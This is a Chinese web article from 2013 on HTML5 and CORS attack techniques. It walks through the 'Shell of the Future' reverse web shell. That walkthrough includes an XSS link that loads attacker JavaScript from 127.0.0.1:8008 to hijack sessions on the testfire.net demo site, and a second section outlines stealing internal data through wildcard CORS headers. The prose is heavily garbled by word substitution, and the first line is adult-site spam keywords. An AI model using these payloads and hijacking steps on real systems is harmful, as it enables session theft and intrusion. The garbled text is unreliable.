国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動安全 安全管理 應(yīng)用案例 網(wǎng)絡(luò)威脅系統(tǒng)安全 應(yīng)用安全 數(shù)據(jù)安全 云安全
當(dāng)前位置: 主頁 > 信息安全 > 系統(tǒng)安全 >

揭密HTML 5帶來的報復(fù)打擊手法

時間:2013-08-16 14:02來源:TuZhiJiaMi企業(yè)信息安全專家 點擊:
HTML5 是下一代的HTML,HTML5付與網(wǎng)頁更好的意義和布局。加倍豐碩的標(biāo)簽將跟著對RDFa的,微數(shù)據(jù)與微格局等方面的撐持,構(gòu)建對法度、對用戶都更有價值的數(shù)據(jù)驅(qū)動的Web?;贖TML5開辟的網(wǎng)頁A
Tags系統(tǒng)安全(735)HTML5(5)攻擊手法(1)  

  HTML5 是下一代的HTML,HTML5付與網(wǎng)頁更好的意義和布局。加倍豐碩的標(biāo)簽將跟著對RDFa的,微數(shù)據(jù)與微格局等方面的撐持,構(gòu)建對法度、對用戶都更有價值的數(shù)據(jù)驅(qū)動的Web。基于HTML5開辟的網(wǎng)頁APP具有更短的啟動時候,更快的聯(lián)網(wǎng)速度。本文具體介紹了HTML5的普及,帶來的新的安然威脅。

揭密HTML5帶來的報復(fù)打擊手法

  1、CORS(Cross-Origin Resource Sharing) 跨域資本共享

  為了構(gòu)建高品質(zhì)的網(wǎng)站,和知足日趨增加的用戶需求,HTML5針對SOP(同源策略)放寬了一些限制,簡單的說,同源策略承諾來自統(tǒng)一站點的頁面拜候其頁面的編制和屬性等,但限制了跨域調(diào)用其他頁面的編制和屬性。此刻HTML5放寬了這些限制,XMLHttpRequest Level 2新增了功能CORS和談,承諾Ajax倡議跨域的要求,瀏覽器是可以倡議跨域要求的,好比你可以外鏈一個外域的圖片或腳本??墒荍avascript腳本是不克不及獲得這些資本的內(nèi)容的,它只能被瀏覽器履行或襯著。

  COR是頁面層次的節(jié)制模式。每個頁面需要返回一個名為‘Access-Control-Allow-Origin’的HTTP頭來承諾外域的站點拜候。你可以僅僅透露有限的資本和有限的外域站點拜候。在COR模式中,拜候節(jié)制的職責(zé)可以放到頁面開辟者的手中,而不是辦事器治理員。當(dāng)然頁面開辟者需要寫專門的措置代碼來承諾被外域拜候。

  所以只要b.com承諾,a.com可利用ajax獲得A上肆意數(shù)據(jù),國外安然研究者Lava Kumar開辟了一款東西“Shell of the future”。

  Shell of the Future 是一個反向Web Shell措置東西(Reverse Web Shell handler)。操縱跨站腳本報復(fù)打擊或瀏覽器地址欄注進(jìn)javascript今后,Shell of the Future可進(jìn)行劫持會話。 它操縱了HTML5撐持的Cross Origin Requests,可以繞過一些反會話劫持的編制,如HTTP-Only限制的cookie,幫定IP地址的會話ID。

  若何利用該東西:

  1、下載并解壓該東西,雙擊“Shell of the Future.exe”,會彈出一個窗口。

揭密HTML5帶來的報復(fù)打擊手法

  2、輸進(jìn)肆意端口,點擊“Start”。

  3、利用瀏覽器拜候http://127.0.0.1:8008/sotf.console (firefox結(jié)果最好)

  4、不出標(biāo)題問題,你將看到以下畫面。(Shell of the Future有兩個JavaScript的exp- e1.js和e2.js,我們可以操縱XSS縫隙將其嵌進(jìn)到受害者的瀏覽器)

揭密HTML5帶來的報復(fù)打擊手法

  5、當(dāng)一個用戶登錄下面的測試網(wǎng)站:

  http://www.testfire.net/bank/login.aspx (admin/admin)

  該站點的搜刮功能粗在一個XSS縫隙,http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E

  6、報復(fù)打擊者發(fā)送一個歹意鏈接給用戶,以下:

  http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E

  7、當(dāng)用戶點擊以后,報復(fù)打擊者的IP地址將會發(fā)送給報復(fù)打擊者,然后點擊“Hijack Session”:

揭密HTML5帶來的報復(fù)打擊手法

  8、點擊Hijack Session以后,將呈現(xiàn)以下畫面:

  3、拜候內(nèi)部辦事器:

  良多互聯(lián)網(wǎng)公司除有ONLINE對外的營業(yè)以外,在內(nèi)部也用著良多的利用,如財務(wù)治理系統(tǒng)、員工治理系統(tǒng)和其他的一些內(nèi)部社區(qū)等,良多開辟者為了各個利用之間調(diào)用精練便利,在良多利用中都添加了以下頭:

  Control-Allow-Origin: *

  報復(fù)打擊者可以操縱社會工程學(xué),讓內(nèi)部用戶點擊一個鏈接,然掉隊犯者便可以拜候到內(nèi)部的一些資本,以下為把持步調(diào):

  1、員工登錄到內(nèi)部的某利用,如www.internalurl.com

  2、internalurl辦事器返回的響應(yīng)頭設(shè)置了Access-Control-Allow-Origin: *(承諾任何域倡議的要求都可以獲得當(dāng)前辦事器的數(shù)據(jù)。)

  3、員工遭到一封郵件,點擊了鏈接 – www.malicioussite.com

  4、這個站點包含了正常的UI內(nèi)容,所以員工一般不會發(fā)覺,可是,該頁面包含了一段javascript代碼。

  5、該javascript代碼會發(fā)送一個XMLHttpRequest要求。

  6、闡發(fā)返回的數(shù)據(jù)包,并把它發(fā)送到報復(fù)打擊者的辦事器。

  7、報復(fù)打擊者獲得到公司內(nèi)部站點的相干信息。

------分隔線----------------------------

推薦內(nèi)容